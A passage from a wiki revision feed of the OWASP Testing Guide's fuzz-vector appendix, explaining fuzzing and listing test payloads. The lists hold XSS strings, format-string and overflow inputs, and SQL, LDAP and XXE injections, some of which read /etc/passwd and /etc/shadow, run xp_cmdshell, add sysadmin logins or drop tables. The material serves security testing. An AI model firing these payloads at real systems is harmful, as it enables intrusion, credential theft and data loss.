 &amp;lt;nowiki&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;ISO-8859-1&amp;quot;?&amp;gt;&amp;lt;foo&amp;gt;&amp;lt;![CDATA[' or 1=1 or ''=']]&amp;gt;&amp;lt;/foof&amp;gt;&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;ISO-8859-1&amp;quot;?&amp;gt;&amp;lt;!DOCTYPE foo [&amp;lt;!ELEMENT foo ANY&amp;gt;&amp;lt;!ENTITY xxe SYSTEM &amp;quot;file://c:/boot.ini&amp;quot;&amp;gt;]&amp;gt;&amp;lt;foo&amp;gt;&amp;amp;xee;&amp;lt;/foo&amp;gt;&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;ISO-8859-1&amp;quot;?&amp;gt;&amp;lt;!DOCTYPE foo [&amp;lt;!ELEMENT foo ANY&amp;gt;&amp;lt;!ENTITY xxe SYSTEM &amp;quot;file:///etc/passwd&amp;quot;&amp;gt;]&amp;gt;&amp;lt;foo&amp;gt;&amp;amp;xee;&amp;lt;/foo&amp;gt;&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;ISO-8859-1&amp;quot;?&amp;gt;&amp;lt;!DOCTYPE foo [&amp;lt;!ELEMENT foo ANY&amp;gt;&amp;lt;!ENTITY xxe SYSTEM &amp;quot;file:///etc/shadow&amp;quot;&amp;gt;]&amp;gt;&amp;lt;foo&amp;gt;&amp;amp;xee;&amp;lt;/foo&amp;gt;&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;ISO-8859-1&amp;quot;?&amp;gt;&amp;lt;!DOCTYPE foo [&amp;lt;!ELEMENT foo ANY&amp;gt;&amp;lt;!ENTITY xxe SYSTEM &amp;quot;file:///dev/random&amp;quot;&amp;gt;]&amp;gt;&amp;lt;foo&amp;gt;&amp;amp;xee;&amp;lt;/foo&amp;gt;&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
{{Category:OWASP Testing Project AoC}}&lt;/div&gt;</summary>
		<author><name>Subere</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=OWASP_Testing_Guide_Appendix_C:_Fuzz_Vectors&amp;diff=14334</id>
		<title>OWASP Testing Guide Appendix C: Fuzz Vectors</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=OWASP_Testing_Guide_Appendix_C:_Fuzz_Vectors&amp;diff=14334"/>
				<updated>2006-12-13T23:37:30Z</updated>
		
		<summary type="html">&lt;p&gt;Subere: /* Buffer Overflows (BFO) */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[http://www.owasp.org/index.php/Web_Application_Penetration_Testing_AoC Up]]&amp;lt;br&amp;gt;&lt;br /&gt;
{{Template:OWASP Testing Guide v2}}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
The following are fuzzing vectors which can be used with [[WebScarab]], [[JBroFuzz]], [[WSFuzzer]], or another fuzzer.&lt;br /&gt;
Fuzzing is the &amp;quot;kitchen sink&amp;quot; approach to testing the response of an application to parameter manipulation. Generally one looks for error conditions that are generated in an application as a result of fuzzing.&lt;br /&gt;
This is the simple part of the discovery phase.&lt;br /&gt;
Once an error has been discovered identifying and exploiting a potential vulnerability is where skill is required.&lt;br /&gt;
&lt;br /&gt;
=== Fuzz Categories ===&lt;br /&gt;
&lt;br /&gt;
In the case of stateless network protocol fuzzing (like HTTP(S)) two broad categories exist:&lt;br /&gt;
&lt;br /&gt;
* Recursive fuzzing&lt;br /&gt;
* Replacive fuzzing&lt;br /&gt;
&lt;br /&gt;
We examine and define each category in the sub-sections that follow. &lt;br /&gt;
&lt;br /&gt;
==== Recursive fuzzing ====&lt;br /&gt;
&lt;br /&gt;
Recursive fuzzing can be defined as the process of fuzzing a part of a request by iterating through all the possible combinations of a set alphabet. Consider the case of:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;http://www.example.com/8302fa3b&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Selecting &amp;quot;8302fa3b&amp;quot; as a part of the request to be fuzzed against the set hexadecimal alphabet i.e. {0,1,2,3,4,5,6,7,8,9,a,b,c,d,e,f} falls under the category of recursive fuzzing. This would generate a total of 16^8 requests of the form:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;http://www.example.com/00000000&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;...&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;http://www.example.com/11000fff&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;...&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;http://www.example.com/ffffffff&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Replacive fuzzing ====&lt;br /&gt;
&lt;br /&gt;
Replacive fuzzing can be defined as the process of fuzzing part of a request by means of replacing it with a set value. This value is known as a fuzz vector. In the case of:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;http://www.example.com/8302fa3b&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Testing against Cross Site Scripting (XSS) by sending the following fuzz vectors: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;http://www.example.com/&amp;gt;&amp;quot;&amp;gt;&amp;lt;script&amp;gt;alert(&amp;quot;XSS&amp;quot;)&amp;lt;/script&amp;gt;&amp;amp;&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;http://www.example.com/'';!--&amp;quot;&amp;lt;XSS&amp;gt;=&amp;amp;{()}&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
This is a form of replacive fuzzing. In this category, the total number of requests is dependant on the number of fuzz vectors specified. &lt;br /&gt;
&lt;br /&gt;
The remainder of this appendix presents a number of fuzz vector categories.&lt;br /&gt;
&lt;br /&gt;
=== Cross Site Scripting (XSS) ===&lt;br /&gt;
&lt;br /&gt;
For details on XSS: [[Cross_site_scripting_AoC]]&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;&amp;gt;&amp;quot;&amp;gt;&amp;lt;script&amp;gt;alert(&amp;quot;XSS&amp;quot;)&amp;lt;/script&amp;gt;&amp;amp;&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;&amp;quot;&amp;gt;&amp;lt;STYLE&amp;gt;@import&amp;quot;javascript:alert('XSS')&amp;quot;;&amp;lt;/STYLE&amp;gt;&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;&amp;gt;&amp;quot;'&amp;gt;&amp;lt;img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;&lt;br /&gt;
 alert(%26quot;%26%23x20;XSS%26%23x20;Test%26%23x20;Successful%26quot;)&amp;gt;&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;&amp;gt;%22%27&amp;gt;&amp;lt;img%20src%3d%22javascript:alert(%27%20XSS%27)%22&amp;gt;&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;'%uff1cscript%uff1ealert('XSS')%uff1c/script%uff1e'&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;&amp;quot;&amp;gt;&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;&amp;gt;&amp;quot;&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;'';!--&amp;quot;&amp;lt;XSS&amp;gt;=&amp;amp;{()}&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;&amp;lt;IMG SRC=&amp;quot;javascript:alert('XSS');&amp;quot;&amp;gt;&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;&amp;lt;IMG SRC=javascript:alert('XSS')&amp;gt;&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;&amp;lt;IMG SRC=JaVaScRiPt:alert('XSS')&amp;gt; &amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;&amp;lt;IMG SRC=JaVaScRiPt:alert(&amp;amp;amp;quot;XSS&amp;lt;WBR&amp;gt;&amp;amp;amp;quot;)&amp;gt;&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;&amp;lt;IMGSRC=&amp;amp;amp;#106;&amp;amp;amp;#97;&amp;amp;amp;#118;&amp;amp;amp;#97;&amp;amp;amp;&amp;lt;WBR&amp;gt;#115;&amp;amp;amp;#99;&amp;amp;amp;#114;&amp;amp;amp;#105;&amp;amp;amp;#112;&amp;amp;amp;&amp;lt;WBR&amp;gt;#116;&amp;amp;amp;#58;&amp;amp;amp;#97;&lt;br /&gt;
 &amp;amp;amp;#108;&amp;amp;amp;#101;&amp;amp;amp;&amp;lt;WBR&amp;gt;#114;&amp;amp;amp;#116;&amp;amp;amp;#40;&amp;amp;amp;#39;&amp;amp;amp;#88;&amp;amp;amp;#83&amp;lt;WBR&amp;gt;;&amp;amp;amp;#83;&amp;amp;amp;#39;&amp;amp;amp;#41&amp;gt;&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;&amp;lt;IMGSRC=&amp;amp;#0000106&amp;amp;#0000097&amp;amp;&amp;lt;WBR&amp;gt;#0000118&amp;amp;#0000097&amp;amp;#0000115&amp;amp;&amp;lt;WBR&amp;gt;#0000099&amp;amp;#0000114&amp;amp;#0000105&amp;amp;&amp;lt;WBR&amp;gt;#0000112&amp;amp;#0000116&amp;amp;#0000058&lt;br /&gt;
 &amp;amp;&amp;lt;WBR&amp;gt;#0000097&amp;amp;#0000108&amp;amp;#0000101&amp;amp;&amp;lt;WBR&amp;gt;#0000114&amp;amp;#0000116&amp;amp;#0000040&amp;amp;&amp;lt;WBR&amp;gt;#0000039&amp;amp;#0000088&amp;amp;#0000083&amp;amp;&amp;lt;WBR&amp;gt;#0000083&amp;amp;#0000039&amp;amp;#0000041&amp;gt;&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;           &lt;br /&gt;
 &amp;lt;nowiki&amp;gt;&amp;lt;IMGSRC=&amp;amp;#x6A&amp;amp;#x61&amp;amp;#x76&amp;amp;#x61&amp;amp;#x73&amp;amp;&amp;lt;WBR&amp;gt;#x63&amp;amp;#x72&amp;amp;#x69&amp;amp;#x70&amp;amp;#x74&amp;amp;#x3A&amp;amp;&amp;lt;WBR&amp;gt;#x61&amp;amp;#x6C&amp;amp;#x65&amp;amp;#x72&amp;amp;#x74&amp;amp;#x28&lt;br /&gt;
 &amp;amp;&amp;lt;WBR&amp;gt;#x27&amp;amp;#x58&amp;amp;#x53&amp;amp;#x53&amp;amp;#x27&amp;amp;#x29&amp;gt;&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;&amp;lt;IMG SRC=&amp;quot;jav&amp;amp;amp;#x09;ascript:alert(&amp;lt;WBR&amp;gt;'XSS');&amp;quot;&amp;gt;&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;&amp;lt;IMG SRC=&amp;quot;jav&amp;amp;amp;#x0A;ascript:alert(&amp;lt;WBR&amp;gt;'XSS');&amp;quot;&amp;gt;&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;&amp;lt;IMG SRC=&amp;quot;jav&amp;amp;amp;#x0D;ascript:alert(&amp;lt;WBR&amp;gt;'XSS');&amp;quot;&amp;gt;&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Buffer Overflows and Format String Errors ===&lt;br /&gt;
&lt;br /&gt;
==== Buffer Overflows (BFO) ====&lt;br /&gt;
A buffer overflow or memory corruption attack is a programming condition which allows overflowing of valid data beyond its prelocated storage limit in memory.&lt;br /&gt;
&lt;br /&gt;
For details on Buffer Overflows: [[Buffer_Overflow_Testing_AoC]]&lt;br /&gt;
&lt;br /&gt;
Note that attempting to load such a definition file within a fuzzer application can potentially cause the application to crash.&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;A x 5&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;A x 17&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;A x 33&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;A x 65&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;A x 129&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;A x 257&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;A x 513&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;A x 1024&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;A x 2049&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;A x 4097&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;A x 8193&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;A x 12288&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Format String Errors (FSE) ====&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;%s%p%x%d&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;.1024d&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;%.2049d&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;%p%p%p%p&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;%x%x%x%x&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;%d%d%d%d&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;%s%s%s%s&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;%99999999999s&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;%08x&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;%%20d&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;%%20n&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;%%20x&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;%%20s&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;%s%s%s%s%s%s%s%s%s%s&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;%p%p%p%p%p%p%p%p%p%p&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;%#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%%&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;%s x 129&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;%x x 257&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Integer Overflows (INT) ====&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;-1&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;0&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;0x100&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;0x1000&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;0x3fffffff&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;0x7ffffffe&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;0x7fffffff&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;0x80000000&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;0xfffffffe&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;0xffffffff&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;0x10000&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;0x100000&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== SQL Injection ===&lt;br /&gt;
&lt;br /&gt;
For details on Testing SQL Injection: [[Testing_for_SQL_Injection]]&lt;br /&gt;
&lt;br /&gt;
==== Passive SQL Injection (SQP) ====&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;'||(elt(-3+5,bin(15),ord(10),hex(char(45))))&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;||6&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;'||'6&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;(||6)&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;' OR 1=1--&amp;lt;/nowiki&amp;gt; &lt;br /&gt;
 &amp;lt;nowiki&amp;gt;OR 1=1&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;' OR '1'='1&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;; OR '1'='1'&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;%22+or+isnull%281%2F0%29+%2F*&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;%27+OR+%277659%27%3D%277659&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;%22+or+isnull%281%2F0%29+%2F*&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;%27+--+&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;' or 1=1--&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;&amp;quot; or 1=1--&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;' or 1=1 /*&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;or 1=1--&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;' or 'a'='a&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;&amp;quot; or &amp;quot;a&amp;quot;=&amp;quot;a&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;') or ('a'='a&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;Admin' OR '&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;'%20SELECT%20*%20FROM%20INFORMATION_SCHEMA.TABLES--&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;) UNION SELECT%20*%20FROM%20INFORMATION_SCHEMA.TABLES;&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;' having 1=1--&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;' having 1=1--&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;' group by userid having 1=1--&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;' SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = tablename')--&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;' or 1 in (select @@version)--&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;' union all select @@version--&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;' OR 'unusual' = 'unusual'&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;' OR 'something' = 'some'+'thing'&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;' OR 'text' = N'text'&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;' OR 'something' like 'some%'&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;' OR 2 &amp;gt; 1&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;' OR 'text' &amp;gt; 't'&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;' OR 'whatever' in ('whatever')&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;' OR 2 BETWEEN 1 and 3&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;' or username like char(37);&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;' union select * from users where login = char(114,111,111,116);&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;' union select &amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;Password:*/=1--&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;UNI/**/ON SEL/**/ECT&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;'; EXECUTE IMMEDIATE 'SEL' || 'ECT US' || 'ER'&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;'; EXEC ('SEL' + 'ECT US' + 'ER')&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;'/**/OR/**/1/**/=/**/1&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;' or 1/*&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;+or+isnull%281%2F0%29+%2F*&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;%27+OR+%277659%27%3D%277659&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;%22+or+isnull%281%2F0%29+%2F*&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;%27+--+&amp;amp;password=&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;'; begin declare @var varchar(8000) set @var=':' select @var=@var+'+login+'/'+password+' ' from users where login &amp;gt; &lt;br /&gt;
 @var select @var as var into temp end --&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;' and 1 in (select var from temp)--&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;' union select 1,load_file('/etc/passwd'),1,1,1;&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;1;(load_file(char(47,101,116,99,47,112,97,115,115,119,100))),1,1,1;&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;' and 1=( if((load_file(char(110,46,101,120,116))&amp;lt;&amp;gt;char(39,39)),1,0));&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Active SQL Injection (SQI) ====&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;'; exec master..xp_cmdshell 'ping 10.10.1.2'--&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;CRATE USER name IDENTIFIED BY 'pass123'&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;CRATE USER name IDENTIFIED BY pass123 TEMPORARY TABLESPACE temp DEFAULT TABLESPACE users; &amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;' ; drop table temp --&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;exec sp_addlogin 'name' , 'password'&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;exec sp_addsrvrolemember 'name' , 'sysadmin'&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;INSERT INTO mysql.user (user, host, password) VALUES ('name', 'localhost', PASSWORD('pass123'))&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;GRANT CONNECT TO name; GRANT RESOURCE TO name;&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;INSERT INTO Users(Login, Password, Level) VALUES( char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72) + char(0x70) &lt;br /&gt;
 + char(0x65) + char(0x74) + char(0x65) + char(0x72),char(0x64)&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== LDAP Injection ===&lt;br /&gt;
&lt;br /&gt;
For details on LDAP Injection: [[LDAP_Injection_Testing_AoC]]&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;|&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;!&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;(&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;)&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;%28&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;%29&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;&amp;amp;&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;%26&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;%21&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;%7C&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;*|&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;%2A%7C&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;*(|(mail=*))&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;%2A%28%7C%28mail%3D%2A%29%29&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;*(|(objectclass=*))&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;%2A%28%7C%28objectclass%3D%2A%29%29&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;*()|%26'&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;admin*&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;admin*)((|userPassword=*)&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
